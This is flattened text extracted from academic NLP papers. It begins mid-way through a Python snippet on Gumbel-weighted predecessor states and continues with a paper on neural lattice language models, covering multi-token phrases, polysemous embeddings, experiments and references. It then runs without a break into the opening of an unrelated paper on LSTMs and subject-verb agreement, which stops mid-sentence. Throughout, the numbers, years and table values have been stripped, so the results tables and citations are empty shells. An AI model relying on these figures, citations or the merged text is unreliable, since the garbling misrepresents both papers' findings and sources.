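        w = np.exp(z - z.max())
        w /= w.sum()
    return (w[:, None] * h_tilde).sum(axis=0)

h_tilde = rng.normal(size=(3, 4))                  # three predecessor states
log_m = np.log(np.array([0.7, 0.2, 0.1]))          # predecessor distribution m
for mode in ["direct", "expectation", "gumbel"]:
    print(mode, combine_predecessors(h_tilde, log_m, mode, tau=0.5))
```

Raising τ toward large values flattens the Gumbel weights toward the direct sum, while τ near zero makes them approach a one-hot sample, matching the interpolation described above.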
there is also psycho-linguistic evidence which supports the fact that humans incorporate multi- token phrases into their mental lexicon. siyanova- chanturia et al. ( ) show that native speakers of a language have significantly reduced response time when processing idiomatic phrases, whether they are used in an idiomatic sense or not, while bannard and matthews ( ) show that children learning a lan- guage are better at speaking common phrases than uncommon ones. this evidence lends credence to the idea that multi-token lexical units are a useful tool for language modeling in humans, and so may also be useful in computational models. . . modeling strategy the underlying lattices utilized in our multi-token phrase experiments are “dense” lattices: lattices where every edge (below a certain length l) is present (fig. , c). this is for two reasons. first, since every sequence of tokens is given an oppor- tunity to be included in the path, all segmentations are candidates, which will potentially allow us to discover arbitrary types of segmentations without a prejudice towards a particular theory of which multi- token units we should be using. second, using a dense lattice makes minibatching very straightfor- ward by ensuring that the computation graphs for each sentence are identical. if the lattices were not dense, the lattices of various sentences in a mini- batch could be different; it then becomes necessary to either calculate a differently-shaped graph for ev- ery sentence, preventing minibatching and hurting training efficiency, or calculate and then mask out the missing edges, leading to wasted computation. since only edges of length l or less are present, the maximum in-degree of any node in the lattice d is no greater than l, giving us the time bound o(l|x|). . . token vocabularies storing an embedding for every possible multi- token chunk would require |v |l unique embed- dings, which is intractable. therefore, we construct our multi-token embeddings by merging composi- tional and non-compositional representations. non-compositional representation we first es- tablish a priori set of “core” chunk-level tokens, each have a dense embedding. in order to guarantee full coverage of sentences, we first add every unit-level token to this vocabulary, e.g. every word in the cor- pus for a word-level model. following this, we also add the most frequent n-grams (where < n ≤ l). this ensures that the vast majority of sentences will have several longer chunks appear within them, and so will be able to take advantage of tokens at larger granularities. compositional representation however, the non-compositional embeddings above only account for a subset of all n-grams, so we additionally construct compositional embeddings for each chunk by running a bilstm encoder over the individual embeddings of each unit-level token within it (dyer et al., ). in this way, we can create a unique embedding for every sequence of unit-level tokens. we use this composition function on chunks regardless of whether they are assigned non- compositional embeddings or not, as even high- frequency chunks may display compositional prop- erties. thus, for every chunk, we compute the chunk embedding vector xji by concatenating the compo- sitional embedding with the non-compositional em- bedding if it exists, or otherwise with an <unk> embedding. sentinel mixture model for predictions at each timestep, we want to use our lstm hidden state ht to assign some probability mass to every chunk with a length less than l. 
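The sketch below illustrates the chunk-embedding construction just described: a toy forward/backward recurrence stands in for the BiLSTM encoder, and a two-entry dictionary stands in for the core non-compositional vocabulary; all names and sizes are hypothetical. The prediction model that consumes these embeddings is described next.

```python
import numpy as np

rng = np.random.default_rng(0)
E = 6                                                    # unit-level embedding size
word_emb  = {w: rng.normal(size=E) * 0.1 for w in ["prime", "minister", "rock"]}
chunk_emb = {("prime", "minister"): rng.normal(size=E) * 0.1}   # non-compositional
UNK_CHUNK = np.zeros(E)                                  # <unk> chunk embedding
W_f = rng.normal(size=(E, 2 * E)) * 0.1                  # forward / backward cells
W_b = rng.normal(size=(E, 2 * E)) * 0.1                  # (stand-ins for a BiLSTM)

def compositional(chunk):
    """Run a toy forward and backward recurrence over the unit embeddings and
    concatenate the two final states."""
    f = np.zeros(E)
    for w in chunk:
        f = np.tanh(W_f @ np.concatenate([f, word_emb[w]]))
    b = np.zeros(E)
    for w in reversed(chunk):
        b = np.tanh(W_b @ np.concatenate([b, word_emb[w]]))
    return np.concatenate([f, b])

def chunk_embedding(chunk):
    """Concatenate the compositional encoding with the non-compositional
    embedding if the chunk is in the core vocabulary, else with <unk>."""
    return np.concatenate([compositional(chunk),
                           chunk_emb.get(tuple(chunk), UNK_CHUNK)])

print(chunk_embedding(("prime", "minister")).shape)      # (3 * E,)
```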
to do this, we follow merity et al. ( ) in creating a new “sentinel” token <s> and adding it to our vocabulary. at each timestep, we first use our neural network to calculate a score for each chunk c in our vocabulary, including the sentinel token. we do a softmax across these scores to assign a probability pmain(ct+ | ht;θ) to every chunk in our vocabulary, and also to <s>. for token sequences not represented in our chunk vocabulary, this probability pmain(ct+ | ht;θ) = . next, the probability mass assigned to the sentinel value, pmain(<s> | ht;θ), is distributed across all possible tokens sequences of length less than l, us- ing another lstm with parameters θsub. similar to jozefowicz et al. ( ), this sub-lstm is initial- ized by passing in the hidden state of the main lattice lstm at that timestep. this gives us a probability for each sequence psub(c ,c , . . . ,cl | ht;θsub). the final formula for calculating the probability mass assigned to a specific chunk c is: p(c | ht;θ) =pmain(c | ht;θ)+ pmain(<s> | ht;θ)psub(c | ht;θsub). . incorporating polysemous tokens . . motivation a second shortcoming of current language mod- eling approaches is that each word is associated with only one embedding. for highly polysemous words, a single embedding may be unable to represent all meanings effectively. there has been past work in word embeddings which has shown that using multiple embeddings for each word is helpful in constructing a useful repre- sentation. athiwaratkun and wilson ( ) repre- sented each word with a multimodal gaussian dis- tribution and demonstrated that embeddings of this form were able to outperform more standard skip- gram embeddings on word similarity and entailment tasks. similarly, chen et al. ( ) incorporate standard skip-gram training into a gaussian mixture framework and show that this improves performance on several word similarity benchmarks. when a polysemous word is represented using only a single embedding in a language modeling task, the multimodal nature of the true embedding distribution may causes the resulting embedding to be both high-variance and skewed from the positions of each of the true modes. thus, it is likely useful to represent each token with multiple embeddings when doing language modeling. . . modeling strategy for our polysemy experiments, the underlying lat- tices are multi-lattices: lattices which are also multi- graphs, and can have any number of edges between any given pair of nodes (fig. , d). lattices set up in this manner allow us to incorporate multiple em- beddings for each word. within a single sentence, any pair of nodes corresponds to the start and end of a particular subsequence of the full sentence, and is thus associated with a specific token. each edge between them is a unique embedding for that to- ken. while many strategies for choosing the num- ber of embeddings exist in the literature (neelakan- tan et al., ), in this work, we choose a number of embeddings e and assign that many embeddings to each word. this ensures that the maximum in- degree of any node in the lattice d, is no greater than e, giving us the time bound o(e|x|). in this work, we do not explore models that in- clude both chunk vocabularies and multiple embed- dings. however, combining these two techniques, as well as exploring other, more complex lattice struc- tures, is an interesting avenue for future work. experiments . data we perform experiments on two languages: english and chinese, which provide an interesting contrast in linguistic features. 
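Returning briefly to the sentinel mixture defined above before describing the data, the following sketch makes the mixture concrete. The dictionary `p_main` and the unigram-factored `p_sub` are toy stand-ins for the main softmax and the sub-LSTM (which, in the actual model, also decides where the chunk ends); they are assumptions for illustration only.

```python
import numpy as np

def chunk_probability(chunk, p_main, p_sub):
    """Sentinel mixture:
        p(c | h_t) = p_main(c | h_t) + p_main(<s> | h_t) * p_sub(c | h_t),
    where p_main covers the core chunk vocabulary plus the sentinel <s>, and
    p_sub distributes the sentinel's mass over arbitrary token sequences."""
    in_vocab = p_main.get(chunk, 0.0)          # 0 for chunks outside the vocabulary
    return in_vocab + p_main["<s>"] * p_sub(chunk)

# Toy usage: a three-entry main distribution and a unigram-factored sub-model.
p_main = {("rock",): 0.5, ("rock", "and", "roll"): 0.2, "<s>": 0.3}
unigram = {"rock": 0.4, "and": 0.3, "roll": 0.3}
p_sub = lambda chunk: float(np.prod([unigram[w] for w in chunk]))

print(chunk_probability(("rock", "and", "roll"), p_main, p_sub))
print(chunk_probability(("roll", "and", "rock"), p_main, p_sub))  # out-of-vocab chunk
```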
in english, the most common benchmark for language modeling recently is the penn tree- bank, specifically the version preprocessed by tomáš mikolov ( ). however, this corpus is lim- ited by being relatively small, only containing ap- proximately , sentences, which we found to be insufficient to effectively train lattice language mod- els. thus, we instead used the billion word corpus (chelba et al., ). past experiments on the bwc typically modeled every word without restricting the vocabulary, which results in a number of challenges regarding the modeling of open vocabularies that are orthogonal to this work. thus, we create a pre- code to reproduce datasets and experiments is available at: http://github.com/jbuckman/ neural-lattice-language-models experiments using multi-word units resulted in overfitting, regardless of normalization and hyperparameter settings. processed version of the data in the same manner as mikolov, lowercasing the words, replacing num- bers with <n> tokens, and <unk>ing all words beyond the ten thousand most common. addition- ally, we restricted the data set to only include sen- tences of length or less, ensuring that large mini- batches could fit in gpu memory. our subsampled english corpus contained , , sentences, of which , , were used for training, , for validation, and , for testing. to validate that our methods scale up to larger language modeling scenarios, we also report a smaller set of large-scale experiments on the full billion word benchmark in appendix a. in chinese, we ran experiments on a subset of the chinese gigaword corpus. chinese is also par- ticularly interesting because unlike english, it does not use spaces to delimit words, so segmentation is non-trivial. therefore, we used a character-level lan- guage model for the baseline, and our lattice was composed of multi-character chunks. we used sen- tences from guangming daily, again <unk>ing all but the , most common tokens and restrict- ing the selected sentences to only include sentences of length or less. our subsampled chinese cor- pus included , sentences for training, , for validation, and , for testing. . main experiments we compare a baseline lstm model, dense lattices of size , , and , and a multilattice with and embeddings per word. the implementation of our networks was done in dynet (neubig et al., ). all lstms had lay- ers, each with a hidden dimension of . vari- ational dropout (gal and ghahramani, ) of . was used on the chinese experiments, but hurt per- formance on the english data, so it was not used. the , word embeddings each had dimension . for lattice models, chunk vocabularies were se- lected by taking the , words in the vocabulary and adding the most common , n-grams with < n ≤ l. the weights on the final layer of the net- work were tied with the input embeddings, as done by press and wolf ( ) and inan et al. ( ). in all lattice models, hidden states were computed using a weighted expectation (§ . . ) unless men- tioned otherwise. in multi-embedding models, em- table : results on english language modeling task model valid. perp. test perp. baseline . . multi-token (l = ) . . multi-token (l = ) . . multi-token (l = ) . . multi-emb (e = ) . . multi-emb (e = ) . . table : results on chinese language modeling task model valid. perp. test perp. baseline . . multi-token (l = ) . . multi-token (l = ) . . multi-token (l = ) . . multi-emb (e = ) . . multi-emb (e = ) . . bedding sizes were decreased so as to maintain the same total number of parameters. 
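The chunk vocabularies mentioned above (all unit-level tokens plus the most frequent n-grams with 1 < n ≤ L) can be built with a few lines of counting. The sketch below is an illustration under that description; the corpus, `max_len`, and `num_ngrams` are placeholders rather than the experimental settings.

```python
from collections import Counter

def build_chunk_vocab(corpus, max_len, num_ngrams):
    """Include every unit-level token, then add the most frequent n-grams
    with 1 < n <= max_len as additional chunk-level entries."""
    vocab = {(tok,) for sent in corpus for tok in sent}
    ngrams = Counter()
    for sent in corpus:
        for n in range(2, max_len + 1):
            for i in range(len(sent) - n + 1):
                ngrams[tuple(sent[i:i + n])] += 1
    vocab.update(ng for ng, _ in ngrams.most_common(num_ngrams))
    return vocab

corpus = [s.split() for s in ["the prime minister spoke",
                              "the prime minister resigned"]]
print(sorted(build_chunk_vocab(corpus, max_len=2, num_ngrams=3)))
```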
all models were trained using the adam optimizer with a learning rate of . on a nvidia k gpu. the results can be seen in table and table .

in the multi-token phrase experiments, many additional parameters are accrued by the bilstm encoder and sub-lstm predictive model, making them not strictly comparable to the baseline. to account for this, we include results for l = , which, like the baseline lstm approach, fails to leverage multi-token phrases, but includes the same number of parameters as l = and l = .

in both the english and chinese experiments, we see the same trend: increasing the maximum lattice size decreases the perplexity, and for l = and above, the neural lattice language model outperforms the baseline. similarly, increasing the number of embeddings per word decreases the perplexity, and for e = and above, the multiple-embedding model outperforms the baseline.

hidden state calculation experiments

we compare the various hidden-state calculation approaches discussed in section on the english data using a lattice of size l = and dropout of . . these results can be seen in table .

table : hidden state calculation comparison results
model | valid. perp. | test perp.
baseline | . | .
direct (§ . . ) | . | .
monte carlo (§ . . ) | . | .
marginalization (§ . . ) | . | .
gs interpolation (§ . . ) | . | .

for all hidden state calculation techniques, the neural lattice language models outperform the lstm baseline. the ancestral sampling technique used by chan et al. ( ) is worse than the others, which we found to be due to its getting stuck in a local minimum which represents almost everything as unigrams. there is only a small difference between the perplexities of the other techniques.

discussion and analysis

neural lattice language models convincingly outperform an lstm baseline on the task of language modeling. one interesting note is that in english, which is already tokenized into words and highly polysemous, utilizing multiple embeddings per word is more effective than including multi-word tokens. in contrast, in the experiments on the chinese data, increasing the lattice size of the multi-character tokens is more important than increasing the number of embeddings per character. this corresponds to our intuition; since chinese is not tokenized to begin with, utilizing models that incorporate segmentation and compositionality of elementary units is very important for effective language modeling.

to calculate the probability of a sentence, the neural lattice language model implicitly marginalizes across latent segmentations. by inspecting the probabilities assigned to various edges of the lattice, we can visualize these segmentations, as is done in fig. . the model successfully identifies bigrams which correspond to non-compositional compounds, like "prime minister", and bigrams which correspond to compositional compounds, such as "a quarter". interestingly, this does not occur for all high-frequency bigrams; it ignores those that are not inherently meaningful, such as "<unk> in", yielding qualitatively good phrases.

figure : segmentation of three sentences randomly sampled from the test corpus, using l = . green numbers show probability assigned to token sizes. for example, the first three words in the first sentence have a % and % chance of being "please let me" or "please let me" respectively. boxes around words show greedy segmentation.
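the chunk vocabularies used in the lattice experiments above are built by adding the most frequent multi-word n-grams (with 1 < n ≤ l) on top of the word vocabulary. a minimal sketch of that construction follows; the toy corpus, sizes, and function names are illustrative, not the authors' code.

```python
from collections import Counter

def ngrams(tokens, n):
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

def build_chunk_vocab(sentences, word_vocab, max_len, num_chunks):
    """Return the base word vocabulary plus the most frequent chunks
    of length 2..max_len whose component words are all in-vocabulary."""
    counts = Counter()
    for sent in sentences:
        for n in range(2, max_len + 1):
            for gram in ngrams(sent, n):
                if all(w in word_vocab for w in gram):
                    counts[" ".join(gram)] += 1
    chunks = [c for c, _ in counts.most_common(num_chunks)]
    return list(word_vocab) + chunks

sents = [["the", "prime", "minister", "said", "."],
         ["a", "quarter", "of", "the", "budget", "."]]
vocab = {w for s in sents for w in s}
print(build_chunk_vocab(sents, vocab, max_len=2, num_chunks=5))
```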
in the multiple-embedding experiments, it is possible to see which of the two embeddings of a word was assigned the higher probability for any specific test-set sentence. in order to visualize what types of meanings are assigned to each embedding, we select sentences in which one embedding is preferred, and look at the context in which the word is used. several examples of this can be seen in table ; it is clear from looking at these examples that the system does learn distinct embeddings for different senses of the word. what is interesting, however, is that it does not necessarily learn intuitive semantic meanings; instead it tends to group the words by the context in which they appear. in some cases, like profile and edition, one of the two embeddings simply captures an idiosyncrasy of the training data.

table : comparison of randomly-selected contexts of several words selected from the vocabulary of the billion word corpus, in which the model preferred one embedding over the other.
rock (first embedding): ...at the <unk> pop , rock and jazz... | ...a little bit <unk> rock ,... | ...on light rock and <unk> stations...
rock (second embedding): ...including hsbc , northern rock and... | ...pakistan has a <unk> rock music scene... | ...spokesman for round rock , <unk>...
bank (first embedding): ...being a bank holiday in... | ...all the us bank runs and... | ...by getting the bank 's interests...
bank (second embedding): ...the bank of england has... | ...with the royal bank of scotland... | ...development bank of japan and the...
page (first embedding): ...on page <unk> of the... | ...a source told page six . ... | ...on page <unk> of the...
page (second embedding): ...was it front page news... | ...himself , tony page , the former ... | ...sections of the page that discuss...
profile (first embedding): ...( <unk> : quote , profile , research )... | ...( <unk> : quote , profile , research )... | ...( <unk> : quote , profile , research )...
profile (second embedding): ...so <unk> the profile of the city... | ...the highest profile <unk> held by... | ...from high i , elite schools ,...
edition (first embedding): ...of the second edition of windows... | ...this month 's edition of <unk> , the ... | ...forthcoming d.c. edition of the hit...
edition (second embedding): ...of the new york edition . ... | ...of the new york edition . ... | ...of the new york edition . ...
rodham: ...senators hillary rodham clinton and... | ...making hillary rodham clinton his... | ...hillary rodham clinton 's campaign has...

additionally, for some words, such as rodham in table , the system always prefers one embedding. this is promising, because it means that in future work it may be possible to further improve accuracy and training efficiency by assigning more embeddings to polysemous words, instead of assigning the same number of embeddings to all words.

related work

past work that utilized lattices in neural models for natural language processing centers around using these lattices in the encoder portion of machine translation. su et al. ( ) utilized a variation of the gated recurrent unit (gru) that operated over lattices, and preprocessed lattices over chinese characters that allowed it to effectively encode multiple segmentations. additionally, sperber et al. ( ) proposed a variation of the treelstm with the goal of creating an encoder over speech lattices in speech-to-text. our work tackles language modeling rather than encoding, and thus addresses the issue of marginalization over the lattice.

another recent work which marginalized over multiple paths through a sentence is ling et al. ( ). the authors tackle the problem of code generation, where some components of the code can be copied from the input, via a neural network.
our work expands on this by handling multi-word tokens as input to the neural network, rather than passing in one token at a time. neural lattice language models improve accuracy by helping the gradient flow over smaller paths, pre- venting vanishing gradients. many hierarchical neu- ral language models have been proposed with a sim- ilar objective (koutnik et al., ; zhou et al., ). our work is distinguished from these by the use of latent token-level segmentations that cap- ture meaning directly, rather than simply being high- level mechanisms to encourage gradient flow. chan et al. ( ) propose a model for predict- ing characters at multiple granularities in the de- coder segment of a machine translation system. our work expands on theirs by considering the entire lat- tice at once, rather than considering a only a sin- gle path through the lattice via ancestral sampling. this allows us to train end-to-end without the model collapsing to a local minimum, with no exploration bonus needed. additionally, we propose a more broad class of models, including those incorporat- ing polysemous words, and apply our model to the task of word-level language modeling, rather than character-level transcription. concurrently to this work, van merriënboer et al. ( ) have proposed a neural language model that can similarly handle multiple scales. our work is differentiated in that it is more general: utilizing an open multi-token vocabulary, proposing multiple techniques for hidden state calculation, and handling polysemy using multi-embedding lattices. future work in the future, we would like to experiment with uti- lizing neural lattice language models in extrinsic evaluation, such as machine translation and speech recognition. additionally, in the current model, the non-compositional embeddings must be selected a priori, and may be suboptimal. we are exploring techniques to store fixed embeddings dynamically, so that the non-compositional phrases can be se- lected as part of the end-to-end training. conclusion in this work, we have introduced the idea of a neural lattice language model, which allows us to marginal- ize over all segmentations of a sentence in an end- to-end fashion. in our experiments on the billion word corpus and chinese gigaword corpus, we demonstrated that the neural lattice language model beats an lstm-based baseline at the task of lan- guage modeling, both when it is used to incorpo- rate multiple-word phrases and multiple-embedding words. qualitatively, we observed that the latent segmentations generated by the model correspond well to human intuition about multi-word phrases, and that the varying usage of words with multiple embeddings seems to also be sensible. acknowledgements the authors would like to thank holger schwenk, kristina toutanova, cindy robinson, and all the re- viewers of this work for their invaluable feedback. references oliver adams, adam makarucha, graham neubig, steven bird, and trevor cohn. . cross-lingual word embeddings for low-resource language model- ing. in proceedings of the th conference of the eu- ropean chapter of the association for computational linguistics: volume , long papers, volume , pages – . ben athiwaratkun and andrew wilson. . multi- modal word distributions. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), volume , pages – . dzmitry bahdanau, jan chorowski, dmitriy serdyuk, philemon brakel, and yoshua bengio. . 
end- to-end attention-based large-vocabulary speech recog- nition. in ieee international conference on acous- tics, speech and signal processing, pages – . ieee. colin bannard and danielle matthews. . stored word sequences in language learning: the effect of familiarity on children’s repetition of four-word com- binations. psychological science, ( ): – . william chan, yu zhang, quoc le, and navdeep jaitly. . latent sequence decompositions. th interna- tional conference on learning representations. ciprian chelba, tomas mikolov, mike schuster, qi ge, thorsten brants, phillipp koehn, and tony robinson. . one billion word benchmark for measuring progress in statistical language modeling. interspeech. xinchi chen, xipeng qiu, jingxiang jiang, and xuanjing huang. . gaussian mixture embeddings for mul- tiple word prototypes. corr, abs/ . . sumit chopra, michael auli, alexander m rush, and seas harvard. . abstractive sentence sum- marization with attentive recurrent neural networks. north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – . pierre dupont and ronald rosenfeld. . lattice based language models. technical report, dtic doc- ument. chris dyer, adhiguna kuncoro, miguel ballesteros, and noah a smith. . recurrent neural network gram- mars. north american chapter of the association for computational linguistics: human language tech- nologies, pages – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yarin gal and zoubin ghahramani. . a theoreti- cally grounded application of dropout in recurrent neu- ral networks. in advances in neural information pro- cessing systems, pages – . sharon goldwater, thomas l. griffiths, mark johnson, et al. . distributional cues to word boundaries: context is important. in h. caunt-nulton, s. kilati- late, and i. woo, editors, bucld : proceedings of the st annual boston university conference on lan- guage development, pages – . somerville, mas- sachusetts: cascadilla press. alex graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. klaus greff, rupesh k. srivastava, jan koutnı́k, bas r. steunebrink, and jürgen schmidhuber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . kyuyeon hwang and wonyong sung. . character- level language modeling with hierarchical recurrent neural networks. in ieee international conference on acoustics, speech and signal processing, pages – . ieee. hakan inan, khashayar khosravi, and richard socher. . tying word vectors and word classifiers: a loss framework for language modeling. th international conference on learning representations. eric jang, shixiang gu, and ben poole. . categori- cal reparameterization with gumbel-softmax. th in- ternational conference on learning representations. rafal jozefowicz, oriol vinyals, mike schuster, noam shazeer, and yonghui wu. . exploring the limits of language modeling. arxiv: . . philipp koehn and rebecca knowles. . six chal- lenges for neural machine translation. in proceedings of the first workshop on neural machine translation, pages – . jan koutnik, klaus greff, faustino gomez, and juergen schmidhuber. . a clockwork rnn. proceedings of machine learning research. wang ling, isabel trancoso, chris dyer, and alan w. black. . 
character-based neural machine transla- tion. corr, abs/ . . wang ling, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, andrew senior, fumin wang, and phil blunsom. . latent predictor networks for code generation. association for computational lin- guistics. chris j maddison, andriy mnih, and yee whye teh. . the concrete distribution: a continuous relax- ation of discrete random variables. th international conference on learning representations. stephen merity, caiming xiong, james bradbury, and richard socher. . pointer sentinel mixture mod- els. th international conference on learning repre- sentations. arvind neelakantan, jeevan shankar, re passos, and an- drew mccallum. . efficient nonparametric es- timation of multiple embeddings per word in vector space. in proceedings of emnlp. citeseer. graham neubig, masato mimura, shinsuke mori, and tatsuya kawahara. . learning a language model from continuous speech. in interspeech, pages – . graham neubig, chris dyer, yoav goldberg, austin matthews, waleed ammar, antonios anastasopoulos, miguel ballesteros, david chiang, daniel clothiaux, trevor cohn, et al. . dynet: the dynamic neural network toolkit. arxiv preprint arxiv: . . ofir press and lior wolf. . using the output embed- ding to improve language models. th international conference on learning representations. yael ravin and claudia leacock. . polysemy: the- oretical and computational approaches. oup ox- ford. rico sennrich, barry haddow, and alexandra birch. . neural machine translation of rare words with subword units. association for computational lin- guistics. anna siyanova-chanturia, kathy conklin, and norbert schmitt. . adding more fuel to the fire: an eye-tracking study of idiom processing by native and non-native speakers. second language research, ( ): – . matthias sperber, graham neubig, jan niehues, and alex waibel. . neural lattice-to-sequence mod- els for uncertain inputs. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – . jinsong su, zhixing tan, deyi xiong, and yang liu. . lattice-based recurrent neural net- work encoders for neural machine translation. corr, abs/ . , ver. . kai sheng tai, richard socher, and christopher d. man- ning. . improved semantic representations from tree-structured long short-term memory networks. as- sociation for computational linguistics. lukáš burget jan honza cernock sanjeev khudanpur tomáš mikolov, martin karafiát. . recur- rent neural network based language model. pro- ceedings of the th annual conference of the inter- national speech communication association, pages – . bart van merriënboer, amartya sanyal, hugo larochelle, and yoshua bengio. . multiscale sequence modeling with a learned dictionary. arxiv preprint arxiv: . . ladislav zgusta. . multiword lexical units. word, ( - ): – . hao zhou, zhaopeng tu, shujian huang, xiaohua liu, hang li, and jiajun chen. . chunk-based bi- scale decoder for neural machine translation. associa- tion for computational linguistics. a large-scale experiments to verify that our findings scale to state-of-the- art language models, we also compared a baseline model, dense lattices of size and , and a multi- lattice with embeddings per word on the full byte- pair encoded billion word corpus. in this set of experiments, we take the full bil- lion word corpus, and apply byte-pair encoding as described by sennrich et al. ( ) to construct a vocabulary of , sub-word tokens. our model consists of three lstm layers, each with hid- den units. 
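the sub-word vocabulary in the large-scale experiments above is obtained with byte-pair encoding. the following is a compact sketch of bpe merge learning in the spirit of sennrich et al. ( ), not their reference implementation; the toy word-frequency dictionary and function names are illustrative.

```python
import re
from collections import Counter

def pair_counts(vocab):
    pairs = Counter()
    for word, freq in vocab.items():
        symbols = word.split()
        for a, b in zip(symbols, symbols[1:]):
            pairs[(a, b)] += freq
    return pairs

def apply_merge(pair, vocab):
    # merge the pair only where it occurs as two whole symbols
    pattern = re.compile(r"(?<!\S)" + re.escape(" ".join(pair)) + r"(?!\S)")
    merged = "".join(pair)
    return {pattern.sub(merged, word): freq for word, freq in vocab.items()}

def learn_bpe(word_freqs, num_merges):
    # represent each word as space-separated symbols plus an end-of-word marker
    vocab = {" ".join(word) + " </w>": freq for word, freq in word_freqs.items()}
    merges = []
    for _ in range(num_merges):
        pairs = pair_counts(vocab)
        if not pairs:
            break
        best = max(pairs, key=pairs.get)
        vocab = apply_merge(best, vocab)
        merges.append(best)
    return merges

print(learn_bpe({"low": 5, "lower": 2, "newest": 6, "widest": 3}, num_merges=10))
```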
we train the model for a single epoch over the corpus, using the adam optimizer with learning rate . on a p gpu. we use a batch size of , and variational dropout of . . the , sub-word embeddings each had dimension . for lattice models, chunk vocabularies were selected by taking the , sub-words in the vocabulary and adding the most common , n-grams with < n ≤ l. the weights on the final layer of the network were tied with the input embeddings, as done by press and wolf ( ) and inan et al. ( ). in all lattice models, hidden states were computed using weighted expectation (§ . . ). in multi-embedding models, embedding sizes were decreased so as to maintain the same total number of parameters. results of these experiments are in table . the performance of the baseline model is roughly on par with that of state-of-the-art models on this database; differences can be explained by model size and hy- perparameter tuning. the results show the same trend as the results of our main experiments, in- dicating that the performance gains shown by our smaller neural lattice language models generalize to the much larger datasets used in state-of-the-art sys- tems. table : results on large-scale billion word corpus model valid. test sec./ perp. perp. batch baseline . . . multi-token (l = ) . . . multi-token (l = ) . . . multi-emb (e = ) . . . table : vocabulary size comparison model valid. perp. test perp. baseline . . -chunk vocab . . -chunk vocab . . b chunk vocabulary size we compare a -lattice with a non-compositional chunk vocabulary of , phrases with a - lattice with a non-compositional chunk vocabulary of , phrases. the results can be seen in table . doubling the number of non-compositional em- beddings present decreases the perplexity, but only by a small amount. this is perhaps to be expected, given that doubling the number of embeddings cor- responds to a large increase in the number of model parameters for phrases that may have less data with which to train them. assessing the ability of lstms to learn syntax-sensitive dependencies tal linzen , emmanuel dupoux lscp & ijn , cnrs, ehess and ens, psl research university {tal.linzen, emmanuel.dupoux}@ens.fr yoav goldberg computer science department bar ilan university yoav.goldberg@gmail.com abstract the success of long short-term memory (lstm) neural networks in language process- ing is typically attributed to their ability to capture long-distance statistical regularities. linguistic regularities are often sensitive to syntactic structure; can such dependencies be captured by lstms, which do not have ex- plicit structural representations? we begin ad- dressing this question using number agreement in english subject-verb dependencies. we probe the architecture’s grammatical compe- tence both using training objectives with an explicit grammatical target (number prediction, grammaticality judgments) and using language models. in the strongly supervised settings, the lstm achieved very high overall accu- racy (less than % errors), but errors increased when sequential and structural information con- flicted. the frequency of such errors rose sharply in the language-modeling setting. we conclude that lstms can capture a non-trivial amount of grammatical structure given targeted supervision, but stronger architectures may be required to further reduce errors; furthermore, the language modeling signal is insufficient for capturing syntax-sensitive dependencies, and should be supplemented with more direct supervision if such dependencies need to be captured. 
introduction

recurrent neural networks (rnns) are highly effective models of sequential data (elman, ). the rapid adoption of rnns in nlp systems in recent years, in particular of rnns with gating mechanisms such as long short-term memory (lstm) units (hochreiter and schmidhuber, ) or gated recurrent units (gru) (cho et al., ), has led to significant gains in language modeling (mikolov et al., ; sundermeyer et al., ), parsing (vinyals et al., ; kiperwasser and goldberg, ; dyer et al., ), machine translation (bahdanau et al., ) and other tasks. (in this work we use the term rnn to refer to the entire class of sequential recurrent neural networks; instances of the class include long short-term memory networks (lstm) and the simple recurrent network (srn) due to elman ( ).)

the effectiveness of rnns is attributed to their ability to capture statistical contingencies that may span an arbitrary number of words. the word france, for example, is more likely to occur somewhere in a sentence that begins with paris than in a sentence that begins with penguins. the fact that an arbitrary number of words can intervene between the mutually predictive words implies that they cannot be captured by models with a fixed window such as n-gram models, but can in principle be captured by rnns, which do not have an architecturally fixed limit on dependency length.

rnns are sequence models: they do not explicitly incorporate syntactic structure. indeed, many word co-occurrence statistics can be captured by treating the sentence as an unstructured list of words (paris-france); it is therefore unsurprising that rnns can learn them well. other dependencies, however, are sensitive to the syntactic structure of the sentence (chomsky, ; everaert et al., ). to what extent can rnns learn to model such phenomena based only on sequential cues?

previous research has shown that rnns (in particular lstms) can learn artificial context-free languages (gers and schmidhuber, ) as well as nesting and indentation in a programming language (karpathy et al., ). the goal of the present work is to probe their ability to learn natural language hierarchical (syntactic) structures from a corpus without syntactic annotations. as a first step, we focus on a particular dependency that is commonly regarded as evidence for hierarchical structure in human language: english subject-verb agreement, the phenomenon in which the form of a verb depends on whether the subject is singular or plural (the kids play but the kid plays; see additional details in section ). if an rnn-based model succeeded in learning this dependency, that would indicate that it can learn to approximate or even faithfully implement syntactic structure.

our main interest is in whether lstms have the capacity to learn structural dependencies from a natural corpus. we therefore begin by addressing this question under the most favorable conditions: training with explicit supervision. in the setting with the strongest supervision, which we refer to as the number prediction task, we train the model directly on the task of guessing the number of a verb based on the words that preceded it (sections and ).
we further experiment with a grammaticality judgment training objective, in which we provide the model with full sentences an- notated as to whether or not they violate subject-verb number agreement, without an indication of the locus of the violation (section ). finally, we trained the model without any grammatical supervision, using a language modeling objective (predicting the next word). our quantitative results (section ) and qualitative analysis (section ) indicate that most naturally oc- curring agreement cases in the wikipedia corpus are easy: they can be resolved without syntactic informa- tion, based only on the sequence of nouns preceding the verb. this leads to high overall accuracy in all models. most of our experiments focus on the super- vised number prediction model. the accuracy of this model was lower on harder cases, which require the model to encode or approximate structural informa- tion; nevertheless, it succeeded in recovering the ma- jority of agreement cases even when four nouns of the opposite number intervened between the subject and the verb ( % errors). baseline models failed spec- tacularly on these hard cases, performing far below chance levels. fine-grained analysis revealed that mistakes are much more common when no overt cues to syntactic structure (in particular function words) are available, as is the case in noun-noun compounds and reduced relative clauses. this indicates that the number prediction model indeed managed to capture a decent amount of syntactic knowledge, but was overly reliant on function words. error rates increased only mildly when we switched to more indirect supervision consisting only of sentence-level grammaticality annotations without an indication of the crucial verb. by contrast, the language model trained without explicit grammati- cal supervision performed worse than chance on the harder agreement prediction cases. even a state-of- the-art large-scale language model (jozefowicz et al., ) was highly sensitive to recent but struc- turally irrelevant nouns, making more than five times as many 